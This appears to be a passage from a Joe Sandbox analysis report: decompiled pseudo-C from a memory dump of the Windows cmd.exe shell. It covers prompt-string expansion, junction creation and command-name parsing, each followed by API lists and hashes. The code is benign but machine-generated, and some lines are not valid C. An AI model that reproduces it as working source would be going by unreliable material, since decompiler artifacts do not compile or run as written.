                                    				_v48 = _t112;
                                    				_push(_t112);
                                    				_t113 =  &_v28;
                                    				 *[fs:0x0] =  &_v28;
                                    				_v36 = _t222;
                                    				_v672 = 0;
                                    				_t226 =  *0x11fd544; // 0x0
                                    				if(_t226 != 0) {
                                    					_push(0);
                                    					_push(0x2335);
                                    					_t113 = E011DC108(__ecx);
                                    					EnterCriticalSection( *0x1203858);
                                    					 *0x11fd544 = 0;
                                    					LeaveCriticalSection( *0x1203858);
                                    				}
                                    				_t227 =  *0x11fd0c8; // 0x1
                                    				if(_t227 == 0) {
                                    					L96:
                                    					 *[fs:0x0] = _v28;
                                    					_pop(_t199);
                                    					_pop(_t207);
                                    					return E011E6FD0(_t113, _t153, _v48 ^ _t217, _t182, _t199, _t207);
                                    				} else {
                                    					_t228 =  *0x11fd5c8; // 0x0
                                    					if(_t228 == 0) {
                                    						E011E25D9(L"\r\n");
                                    					}
                                    					if( *0x1207896 == 0) {
                                    						_t200 = E011DCFBC(L"PROMPT");
                                    						_v660 = _t200;
                                    						if(_t200 != 0) {
                                    							_v660 = 0x1218110;
                                    							E011E1040(0x1218110, 0x200, _t200);
                                    							 *0x1207896 = 1;
                                    						}
                                    					} else {
                                    						_v660 = 0x1218110;
                                    					}
                                    					_t160 =  *0x1213cb8;
                                    					if( *0x1213cb8 == 0) {
                                    						_t160 = 0x1213ab0;
                                    					}
                                    					_t182 =  *0x1213cc0;
                                    					E011E36CB(_t153, _t160,  *0x1213cc0, 0);
                                    					_t113 = E011F6FA6( &_v680);
                                    					_v676 = _t113;
                                    					if(_t113 == 0) {
                                    						goto L96;
                                    					} else {
                                    						_t201 = _t113;
                                    						_v652 = _t201;
                                    						 *_t113 = 0;
                                    						_t209 = _v680 - 1;
                                    						_v648 = _t209;
                                    						_t163 = _v660;
                                    						if(_t163 == 0) {
                                    							L86:
                                    							_t117 =  *0x1213cb8;
                                    							if( *0x1213cb8 == 0) {
                                    								_t117 = 0x1213ab0;
                                    							}
                                    							_t202 = _v676;
                                    							E011E274C(_t202, _t209, L"%s>", _t117);
                                    							_t164 = _t202;
                                    							_t103 = _t164 + 2; // 0x2
                                    							_t210 = _t103;
                                    							do {
                                    								_t119 =  *_t164;
                                    								_t164 = _t164 + 2;
                                    							} while (_t119 != 0);
                                    							_t201 = _t202 + (_t164 - _t210 >> 1) * 2;
                                    							L91:
                                    							_t167 = 0;
                                    							L92:
                                    							 *_t201 = 0;
                                    							_t203 = _v676;
                                    							_t184 = _v676;
                                    							_t107 = _t184 + 2; // 0x2
                                    							_t211 = _t107;
                                    							do {
                                    								_t121 =  *_t184;
                                    								_t184 = _t184 + 2;
                                    							} while (_t121 != _t167);
                                    							_t182 = _t184 - _t211 >> 1;
                                    							_t113 = E011E2616(_t203, _t184 - _t211 >> 1);
                                    							if( *0x11fd544 != 0) {
                                    								EnterCriticalSection( *0x1203858);
                                    								 *0x11fd544 =  *0x11fd544 & 0x00000000;
                                    								LeaveCriticalSection( *0x1203858);
                                    							}
                                    							goto L96;
                                    						}
                                    						_t122 =  *_t163 & 0x0000ffff;
                                    						if(_t122 == 0) {
                                    							goto L86;
                                    						}
                                    						L14:
                                    						while(_t122 != 0) {
                                    							if(_t122 == 0x24) {
                                    								_t213 =  &(_v660[1]);
                                    								_v660 = _t213;
                                    								_v664 = _t213;
                                    								_t204 = 0;
                                    								_v656 = 0x11d3b90;
                                    								while(towupper( *_t213 & 0x0000ffff) !=  *_v656) {
                                    									_t204 = _t204 + 1;
                                    									_t35 = 0x11d3b90 + _t204 * 6; // 0x30050
                                    									_t138 = _t35;
                                    									_v656 = _t138;
                                    									_t167 = 0;
                                    									if( *_t138 != 0) {
                                    										continue;
                                    									}
                                    									L28:
                                    									_t125 = _t204 * 6;
                                    									_t201 = _v652;
                                    									_t214 = _v648;
                                    									if( *((intOrPtr*)(_t125 + 0x11d3b90)) == _t167) {
                                    										goto L92;
                                    									}
                                    									_t40 = _t125 + 0x11d3b92; // 0x3
                                    									_t187 =  *_t40 & 0x0000ffff;
                                    									if(_t187 != 8) {
                                    										_t45 = _t187 - 1; // 0x2
                                    										_t126 = _t45;
                                    										if(_t126 > 9) {
                                    											L78:
                                    											_t127 =  *0x1213cb8;
                                    											if( *0x1213cb8 == 0) {
                                    												_t127 = 0x1213ab0;
                                    											}
                                    											E011E274C(_t201, _t214, L"%c",  *_t127 & 0x0000ffff);
                                    											_t222 = _t222 + 0x10;
                                    											_t188 = _t201;
                                    											_v664 = _t188 + 2;
                                    											do {
                                    												_t131 =  *_t188;
                                    												_t188 = _t188 + 2;
                                    											} while (_t131 != 0);
                                    											_t189 = _t188 - _v664;
                                    											L83:
                                    											_t190 = _t189 >> 1;
                                    											_t209 = _t214 - _t190;
                                    											_t201 = _t201 + _t190 * 2;
                                    											L84:
                                    											_v648 = _t209;
                                    											_v652 = _t201;
                                    											L85:
                                    											_t173 =  &(_v660[1]);
                                    											_v660 = _t173;
                                    											_t122 =  *_t173 & 0x0000ffff;
                                    											goto L14;
                                    										}
                                    										switch( *((intOrPtr*)(_t126 * 4 +  &M011F7698))) {
                                    											case 0:
                                    												_t132 = E011D96A0(0, 1, _t201, _t214);
                                    												goto L36;
                                    											case 1:
                                    												__edx = 0;
                                    												__edx = 1;
                                    												__ecx = 0;
                                    												__eax = E011D5AEF(0, 1, __edi, __esi);
                                    												L36:
                                    												_t201 = _t201 + _t132 * 2;
                                    												_t209 = _t214 - _t132;
                                    												goto L84;
                                    											case 2:
                                    												__eax =  *0x1213cb8;
                                    												if( *0x1213cb8 == 0) {
                                    													__eax = 0x1213ab0;
                                    												}
                                    												__eax = E011E274C(__edi, __esi, L"%s", __eax);
                                    												__edx = __edi;
                                    												__eax = __edx + 2;
                                    												_v656 = __edx + 2;
                                    												__ecx = 0;
                                    												do {
                                    													__ax =  *__edx;
                                    													__edx = __edx + 2;
                                    												} while (__ax != __cx);
                                    												__edx = __edx - _v656;
                                    												goto L83;
                                    											case 3:
                                    												__ecx =  &_v124;
                                    												E011D443C(__ecx) =  &_v124;
                                    												__esi = E011DB3FC(__ecx, 0x2350,  &_v124);
                                    												E011E274C(__edi, _v648, L"%s", __esi) = LocalFree(__esi);
                                    												__edx = __edi;
                                    												__esi = __edx + 2;
                                    												__ecx = 0;
                                    												do {
                                    													__ax =  *__edx;
                                    													__edx = __edx + 2;
                                    												} while (__ax != __cx);
                                    												__edx = __edx - __esi;
                                    												__esi = _v648;
                                    												goto L83;
                                    											case 4:
                                    												__eax = 0x11d3948;
                                    												if(_v672 == 0) {
                                    													__eax = 0x11d3958;
                                    												}
                                    												__edx = __esi;
                                    												__ecx = __edi;
                                    												__eax = E011E1040(__edi, __esi, __eax);
                                    												__edx = __edi;
                                    												__eax = __edx + 2;
                                    												_v656 = __edx + 2;
                                    												__ecx = 0;
                                    												do {
                                    													__ax =  *__edx;
                                    													__edx = __edx + 2;
                                    												} while (__ax != __cx);
                                    												__edx = __edx - _v656;
                                    												goto L83;
                                    											case 5:
                                    												__edx = __esi;
                                    												__ecx = __edi;
                                    												__eax = E011E1040(__edi, __esi, L"\r\n");
                                    												__edx = __edi;
                                    												__eax = __edx + 2;
                                    												_v656 = __edx + 2;
                                    												__ecx = 0;
                                    												do {
                                    													__ax =  *__edx;
                                    													__edx = __edx + 2;
                                    												} while (__ax != __cx);
                                    												__edx = __edx - _v656;
                                    												goto L83;
                                    											case 6:
                                    												goto L78;
                                    											case 7:
                                    												if( *0x1213cc9 == 0) {
                                    													goto L85;
                                    												}
                                    												__ecx =  *0x1213ce4;
                                    												while(__esi > 1) {
                                    													__eax = __ecx;
                                    													__ecx = __ecx - 1;
                                    													if(__eax == 0) {
                                    														goto L85;
                                    													}
                                    													_push(0x2b);
                                    													_pop(__eax);
                                    													 *__edi = __ax;
                                    													__edi = __edi + 2;
                                    													_v652 = __edi;
                                    													__esi = __esi - 1;
                                    													_v648 = __esi;
                                    												}
                                    												goto L85;
                                    											case 8:
                                    												if( *0x1213cc9 == 0) {
                                    													goto L85;
                                    												}
                                    												_v668 = __ecx;
                                    												__ecx =  *0x1213cb8;
                                    												__eax = __ecx;
                                    												if(__ecx == 0) {
                                    													__eax = 0x1213ab0;
                                    												}
                                    												__ax =  *__eax;
                                    												_v56 =  *__eax;
                                    												if(__ecx == 0) {
                                    													__ecx = 0x1213ab0;
                                    												}
                                    												__ax =  *((intOrPtr*)(__ecx + 2));
                                    												_v54 = __ax;
                                    												_push(0x5c);
                                    												_pop(__eax);
                                    												_v52 = __ax;
                                    												__eax = 0;
                                    												_v50 = __ax;
                                    												__eax =  &_v56;
                                    												if(GetDriveTypeW( &_v56) != 4) {
                                    													goto L85;
                                    												} else {
                                    													__eax = 0;
                                    													_v52 = __ax;
                                    													_v684 = 0x104;
                                    													_v16 = _v16 & 0;
                                    													__eax = E011E7797(__ecx);
                                    													if(__al == 0) {
                                    														_v668 = 0x78;
                                    													} else {
                                    														__eax =  &_v684;
                                    														_push( &_v684);
                                    														__eax =  &_v644;
                                    														_push( &_v644);
                                    														__eax =  &_v56;
                                    														_push( &_v56);
                                    														__eax =  *0x121c028();
                                    														_v668 =  &_v56;
                                    													}
                                    													_v16 = 0xfffffffe;
                                    													if(_v668 == 0) {
                                    														 &_v644 = E011E274C(__edi, __esi, L"%s ",  &_v644);
                                    														__edx = __edi;
                                    														__eax = __edx + 2;
                                    														_v664 = __edx + 2;
                                    														__ecx = 0;
                                    														do {
                                    															__ax =  *__edx;
                                    															__edx = __edx + 2;
                                    														} while (__ax != __cx);
                                    														__edx = __edx - _v664;
                                    													} else {
                                    														if(_v668 == 0x8ca) {
                                    															goto L85;
                                    														}
                                    														_push(L"Unknown");
                                    														_push(__esi);
                                    														_push(__edi);
                                    														__eax = E011E274C();
                                    														__esp = __esp + 0xc;
                                    														__edx = __edi;
                                    														__eax = __edx + 2;
                                    														_v664 = __edx + 2;
                                    														__ecx = 0;
                                    														do {
                                    															__ax =  *__edx;
                                    															__edx = __edx + 2;
                                    														} while (__ax != __cx);
                                    														__edx = __edx - _v664;
                                    													}
                                    													goto L83;
                                    												}
                                    										}
                                    									}
                                    									_t41 = _t125 + 0x11d3b94; // 0x450000
                                    									E011E274C(_t201, _t214, L"%c",  *_t41 & 0x0000ffff);
                                    									_t222 = _t222 + 0x10;
                                    									_t196 = _t201;
                                    									_v656 = _t196 + 2;
                                    									do {
                                    										_t136 =  *_t196;
                                    										_t196 = _t196 + 2;
                                    									} while (_t136 != 0);
                                    									_t189 = _t196 - _v656;
                                    									goto L83;
                                    								}
                                    								_t167 = 0;
                                    								goto L28;
                                    							}
                                    							E011E274C(_t201, _t209, L"%c", _t122 & 0x0000ffff);
                                    							_t222 = _t222 + 0x10;
                                    							_t191 = _t201;
                                    							_t18 = _t191 + 2; // 0x2
                                    							_v656 = _t18;
                                    							_t174 = 0;
                                    							do {
                                    								_t142 =  *_t191;
                                    								_t191 = _t191 + 2;
                                    							} while (_t142 != 0);
                                    							_t193 = _t191 - _v656 >> 1;
                                    							_t201 = _t201 + _t193 * 2;
                                    							_v652 = _t201;
                                    							_t209 = _t209 - _t193;
                                    							_v648 = _t209;
                                    							if(E011D68B5() == 0) {
                                    								L22:
                                    								_v672 = _t174;
                                    								goto L85;
                                    							}
                                    							_v656 =  *_v660 & 0x0000ffff;
                                    							if(E011F7AB0( *_v660 & 0x0000ffff) == 0) {
                                    								_t174 = 0;
                                    								goto L22;
                                    							}
                                    							_v672 = _v656 & 0x0000ffff;
                                    							goto L85;
                                    						}
                                    						goto L91;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(2833377E,?,00000000), ref: 011F7062
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7074
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • towupper.MSVCRT ref: 011F720E
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F7343
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,011D1EB4,011D3958), ref: 011F7467
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,2833377E,?,00000000), ref: 011F765F
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7672
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                    • String ID: %s $%s>$PROMPT$Unknown
                                    • API String ID: 708651206-3050974680
                                    • Opcode ID: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                    • Instruction ID: 95f026a0171d62c6cfe02235972da7af9d2101779e45c98b7c33a3d9a86c882d
                                    • Opcode Fuzzy Hash: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                    • Instruction Fuzzy Hash: 3A02D479A011169BDF3CDF28D84D6BAB7B6FF54304F04829EE909E7294EB305A81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E011FB5E0(void* __ecx, void* __eflags) {
                                    				int _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				void* _v24;
                                    				intOrPtr _v28;
                                    				signed int _v32;
                                    				void* _v36;
                                    				void* _v40;
                                    				void* _v48;
                                    				void* _t60;
                                    				void _t64;
                                    				void* _t68;
                                    				signed int _t77;
                                    				void _t80;
                                    				signed short _t81;
                                    				long _t88;
                                    				WCHAR* _t91;
                                    				void* _t97;
                                    				intOrPtr* _t102;
                                    				void* _t104;
                                    				void* _t109;
                                    				void* _t111;
                                    				long _t114;
                                    				void* _t115;
                                    				void* _t116;
                                    				void* _t117;
                                    
                                    				_t115 = __ecx;
                                    				_v40 = 0;
                                    				_t114 = 1;
                                    				_v16 = 0;
                                    				_v36 = 0;
                                    				_v24 = 0;
                                    				_t91 = E011FB51A( *((intOrPtr*)(__ecx + 8)));
                                    				_t116 = E011FB51A( *((intOrPtr*)(_t115 + 0xc)));
                                    				if(_t91 == 0 || _t116 == 0) {
                                    					L19:
                                    					if(_v36 != 0) {
                                    						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
                                    					}
                                    					if(_t114 != 0 && _v24 != 0) {
                                    						RemoveDirectoryW(_t91);
                                    					}
                                    					return _t114;
                                    				} else {
                                    					if(E011FB9D3(_t91, 0, 1) != 0) {
                                    						if(E011FB91D(_t116) != 0) {
                                    							if(CreateDirectoryW(_t91, 0) == 0) {
                                    								goto L19;
                                    							}
                                    							_v24 = 1;
                                    							_t60 = CreateFileW(_t91, 0x40000000, 1, 0, 3, 0x2000000, 0);
                                    							_v20 = _t60;
                                    							if(_t60 == 0xffffffff) {
                                    								goto L19;
                                    							}
                                    							RtlDosPathNameToNtPathName_U(_t116,  &_v40, 0, 0);
                                    							_t97 = _t116;
                                    							_t10 = _t97 + 2; // 0x2
                                    							_t109 = _t10;
                                    							do {
                                    								_t64 =  *_t97;
                                    								_t97 = _t97 + 2;
                                    							} while (_t64 != _v16);
                                    							_v8 = (_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14;
                                    							_t68 = E011E00B0((_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14);
                                    							_v12 = _t68;
                                    							if(_t68 == 0) {
                                    								_t117 = _v20;
                                    								L18:
                                    								CloseHandle(_t117);
                                    								goto L19;
                                    							}
                                    							memset(_t68, 0, _v8);
                                    							_t102 = _v12;
                                    							 *((short*)(_t102 + 4)) = _v8 + 0xfffffff8;
                                    							 *_t102 = 0xa0000003;
                                    							 *((short*)(_t102 + 8)) = 0;
                                    							 *((short*)(_t102 + 0xa)) = _v40;
                                    							memcpy(_t102 + 0x10, _v36, _v40 & 0x0000ffff);
                                    							_t111 = _v12;
                                    							_t77 =  *(_t111 + 0xa) & 0x0000ffff;
                                    							_v32 = _t77;
                                    							_t104 = _t116;
                                    							 *((short*)(_t111 + 0xc)) = _t77 + 2;
                                    							_t31 = _t104 + 2; // 0x2
                                    							_v28 = _t31;
                                    							do {
                                    								_t80 =  *_t104;
                                    								_t104 = _t104 + 2;
                                    							} while (_t80 != _v16);
                                    							_t81 = (_t104 - _v28 >> 1) + (_t104 - _v28 >> 1);
                                    							 *(_t111 + 0xe) = _t81;
                                    							memcpy((_v32 & 0x0000ffff) + _t111 + 0x12, _t116, _t81 & 0x0000ffff);
                                    							_t117 = _v20;
                                    							_t88 = NtFsControlFile(_t117, 0, 0, 0,  &_v48, 0x900a4, _v12, _v8, 0, 0);
                                    							if(_t88 >= 0) {
                                    								_t114 = 0;
                                    							} else {
                                    								SetLastError(RtlNtStatusToDosError(_t88));
                                    							}
                                    							goto L18;
                                    						}
                                    						_push(0x40002749);
                                    						L4:
                                    						SetLastError();
                                    						goto L19;
                                    					}
                                    					_push(0x4000272e);
                                    					goto L4;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 011FB533
                                      • Part of subcall function 011FB51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 011FB54F
                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 011FB560
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 011FB635
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 011FB656
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 011FB679
                                    • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 011FB694
                                    • memset.MSVCRT ref: 011FB6D5
                                    • memcpy.MSVCRT ref: 011FB70A
                                    • memcpy.MSVCRT ref: 011FB756
                                    • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 011FB778
                                    • RtlNtStatusToDosError.NTDLL ref: 011FB783
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011FB78A
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011FB79C
                                    • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 011FB7B7
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB7C8
                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA0F
                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA37
                                      • Part of subcall function 011FB9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                      • Part of subcall function 011FB9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                      • Part of subcall function 011FB9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                    • String ID:
                                    • API String ID: 223857506-0
                                    • Opcode ID: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                    • Instruction ID: 3b7fc173a566e4ec8d63d451b9b672e8c641dadc770bbcaf787c64c05c6bfcb5
                                    • Opcode Fuzzy Hash: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                    • Instruction Fuzzy Hash: B951C270A00605AFDB19DFB8CC58ABFB7B8EF48204F08412DEA06E7250EB359941CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E011DE040(long __ecx, long __edx) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				signed int _v28;
                                    				void _v548;
                                    				signed int _v549;
                                    				long _v556;
                                    				long _v560;
                                    				signed int _v564;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t81;
                                    				int _t85;
                                    				void* _t89;
                                    				WCHAR* _t90;
                                    				signed char _t91;
                                    				intOrPtr _t92;
                                    				intOrPtr _t96;
                                    				long _t104;
                                    				intOrPtr _t108;
                                    				intOrPtr _t109;
                                    				signed int _t110;
                                    				int _t111;
                                    				signed char _t113;
                                    				void* _t114;
                                    				intOrPtr _t116;
                                    				signed int _t117;
                                    				void* _t118;
                                    				wchar_t* _t119;
                                    				wchar_t* _t120;
                                    				signed int _t121;
                                    				signed int _t122;
                                    				signed int _t124;
                                    				signed int _t129;
                                    				long _t130;
                                    				intOrPtr* _t131;
                                    				signed int _t133;
                                    				intOrPtr* _t134;
                                    				long _t136;
                                    				void* _t145;
                                    				signed int _t147;
                                    				signed int _t148;
                                    				signed int _t149;
                                    				long _t150;
                                    				long _t151;
                                    				signed int _t152;
                                    				void* _t153;
                                    				void* _t154;
                                    
                                    				_t143 = __edx;
                                    				_t81 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t81 ^ _t152;
                                    				_v560 = __edx;
                                    				_t150 = __ecx;
                                    				_v549 = 0;
                                    				_v556 = __ecx;
                                    				_t122 = _t121 | 0xffffffff;
                                    				_v28 = 0;
                                    				_v24 = 1;
                                    				_v20 = 0x104;
                                    				memset( &_v548, 0, 0x104);
                                    				_t154 = _t153 + 0xc;
                                    				if(_v24 == 0) {
                                    					_t85 = 0x104;
                                    				} else {
                                    					_t85 = 0x7fe7;
                                    				}
                                    				_t124 =  &_v548;
                                    				if(E011E0C70(_t124, _t85) < 0) {
                                    					_t147 = 0xfffffffe;
                                    					goto L31;
                                    				} else {
                                    					_t148 = 0;
                                    					while(_t148 < 0x7fe6) {
                                    						_t150 =  *( *((intOrPtr*)(_t150 + 0x38)) + _t148 * 2) & 0x0000ffff;
                                    						_t116 = 0;
                                    						if(_t150 == 0x22) {
                                    							_t117 = _v549;
                                    							_t124 = _t124 & 0xffffff00 | _t117 == 0x00000000;
                                    							_v549 = _t124;
                                    							if(_t117 == 0) {
                                    								_t116 = 0;
                                    							} else {
                                    								_t116 = 1;
                                    							}
                                    							L8:
                                    							if(_t124 != 0 || _t116 != 0) {
                                    								L11:
                                    								if(_t122 != 0xffffffff) {
                                    									L13:
                                    									_t118 = _v28;
                                    									if(_t118 == 0) {
                                    										_t118 =  &_v548;
                                    									}
                                    									 *(_t118 + _t148 * 2) = _t150;
                                    									_t148 = _t148 + 1;
                                    									_t150 = _v556;
                                    									continue;
                                    								}
                                    								_t119 = wcschr(L":.\\", _t150);
                                    								_t154 = _t154 + 8;
                                    								if(_t119 != 0) {
                                    									if( *0x1213cc9 == 0) {
                                    										break;
                                    									}
                                    									_t122 = _t148;
                                    								}
                                    								goto L13;
                                    							} else {
                                    								_t120 = wcschr(L"=,;+/[] \t\"", _t150);
                                    								_t154 = _t154 + 8;
                                    								if(_t120 != 0) {
                                    									break;
                                    								}
                                    								goto L11;
                                    							}
                                    						}
                                    						if(_t150 == 0) {
                                    							break;
                                    						}
                                    						_t124 = _v549;
                                    						goto L8;
                                    					}
                                    					_v564 = _t148;
                                    					if(_t148 == 0) {
                                    						_t147 = _t148 | 0xffffffff;
                                    						L31:
                                    						__imp__??_V@YAXPAX@Z();
                                    						return E011E6FD0(_t147, _t122, _v8 ^ _t152, _t143, _t147, _t150, _v28);
                                    					}
                                    					_t89 = _v28;
                                    					if(_t89 == 0) {
                                    						_t89 =  &_v548;
                                    					}
                                    					 *((short*)(_t89 + _t148 * 2)) = 0;
                                    					if(_t122 != 0xffffffff) {
                                    						_t90 = _v28;
                                    						if(_t90 == 0) {
                                    							_t90 =  &_v548;
                                    						}
                                    						_t91 = GetFileAttributesW(_t90);
                                    						if(_t91 != 0xffffffff) {
                                    							if((_t91 & 0x00000010) == 0) {
                                    								goto L18;
                                    							}
                                    							goto L54;
                                    						} else {
                                    							L54:
                                    							_t114 = _v28;
                                    							_v564 = _t122;
                                    							if(_t114 == 0) {
                                    								_t114 =  &_v548;
                                    							}
                                    							 *((short*)(_t114 + _t122 * 2)) = 0;
                                    							goto L18;
                                    						}
                                    					} else {
                                    						L18:
                                    						_t122 = _v28;
                                    						if(_t122 == 0) {
                                    							_t122 =  &_v548;
                                    						}
                                    						_t149 = 0;
                                    						_t150 = 0x11d1628;
                                    						do {
                                    							_t24 = _t150 - 8; // 0x11d35b0
                                    							_t92 =  *_t24;
                                    							if(_t92 == 0) {
                                    								goto L22;
                                    							}
                                    							__imp___wcsicmp(_t122, _t92);
                                    							_t154 = _t154 + 8;
                                    							if(_t92 == 0) {
                                    								_t113 =  *_t150 & 0x0000ffff;
                                    								if((_t113 & 0x00000004) != 0) {
                                    									if( *0x1213cc9 != 0) {
                                    										goto L25;
                                    									}
                                    									goto L22;
                                    								}
                                    								L25:
                                    								_t128 = _v560;
                                    								 *_v560 = _t113;
                                    								L26:
                                    								 *0x11fd0dc = _t149;
                                    								if(_t149 == 0xffffffff) {
                                    									if(_v28 == 0) {
                                    										_t143 =  &_v548;
                                    									}
                                    									_t129 = 0x2d;
                                    									if(E011DDFC0(0x2d, _t143, _t128) == 0x2d) {
                                    										_t147 = 0x2d;
                                    									} else {
                                    										_v549 = 0;
                                    										_t122 = 0;
                                    										while(1) {
                                    											_t150 =  *( *((intOrPtr*)(_v556 + 0x38)) + _t122 * 2) & 0x0000ffff;
                                    											if(_t150 == 0) {
                                    												break;
                                    											}
                                    											_t109 = 0;
                                    											if(_t150 == 0x22) {
                                    												_t110 = _v549;
                                    												_t129 = _t129 & 0xffffff00 | _t110 == 0x00000000;
                                    												_v549 = _t129;
                                    												if(_t110 == 0) {
                                    													_t109 = 0;
                                    												} else {
                                    													_t109 = 1;
                                    												}
                                    											} else {
                                    												_t129 = _v549;
                                    											}
                                    											if(_t129 == 0) {
                                    												if(_t109 != 0) {
                                    													goto L42;
                                    												}
                                    												_t111 = iswspace(_t150);
                                    												_t154 = _t154 + 4;
                                    												if(_t111 != 0) {
                                    													break;
                                    												}
                                    												_t129 = L"=,;";
                                    												if(E011DD7D4(_t129, _t150) != 0 || _t150 == 0x2f) {
                                    													break;
                                    												} else {
                                    													goto L42;
                                    												}
                                    											} else {
                                    												L42:
                                    												_t122 = _t122 + 1;
                                    												continue;
                                    											}
                                    										}
                                    										_t130 = _v556;
                                    										L28:
                                    										_t131 =  *((intOrPtr*)(_t130 + 0x38));
                                    										_t32 = _t131 + 2; // 0x2
                                    										_t143 = _t32;
                                    										do {
                                    											_t96 =  *_t131;
                                    											_t131 = _t131 + 2;
                                    										} while (_t96 != 0);
                                    										_t133 = _t131 - _t143 >> 1;
                                    										if(_t122 != _t133) {
                                    											_t66 = _t133 + 1; // -1
                                    											_t151 = _t66;
                                    											_t134 =  *((intOrPtr*)(_v556 + 0x3c));
                                    											if(_t134 == 0) {
                                    												L76:
                                    												_t136 = E011E00B0(_t151 + _t151);
                                    												_v560 = _t136;
                                    												if(_t136 == 0) {
                                    													E011F9287(_t136);
                                    													__imp__longjmp(0x120b8b8, 1);
                                    												}
                                    												_t122 = _t122 + _t122;
                                    												_t143 = _t151;
                                    												E011E1040(_t136, _t151,  *((intOrPtr*)(_v556 + 0x38)) + _t122);
                                    												_t103 =  *((intOrPtr*)(_v556 + 0x3c));
                                    												if( *((intOrPtr*)(_v556 + 0x3c)) == 0) {
                                    													_t150 = _v560;
                                    												} else {
                                    													_t143 = _t151;
                                    													_t150 = _v560;
                                    													E011E18C0(_t150, _t151, _t103);
                                    												}
                                    												_t104 = _v556;
                                    												 *(_t104 + 0x3c) = _t150;
                                    												 *((short*)(_t122 +  *((intOrPtr*)(_t104 + 0x38)))) = 0;
                                    												goto L31;
                                    											}
                                    											_t145 = _t134 + 2;
                                    											do {
                                    												_t108 =  *_t134;
                                    												_t134 = _t134 + 2;
                                    											} while (_t108 != 0);
                                    											_t151 = _t151 + (_t134 - _t145 >> 1);
                                    											goto L76;
                                    										}
                                    									}
                                    									goto L31;
                                    								}
                                    								_t130 = _v556;
                                    								_t122 = _v564;
                                    								if(_t149 == 0x14) {
                                    									 *((intOrPtr*)(_t130 + 0x40)) = 1;
                                    								}
                                    								goto L28;
                                    							}
                                    							L22:
                                    							_t150 = _t150 + 0x18;
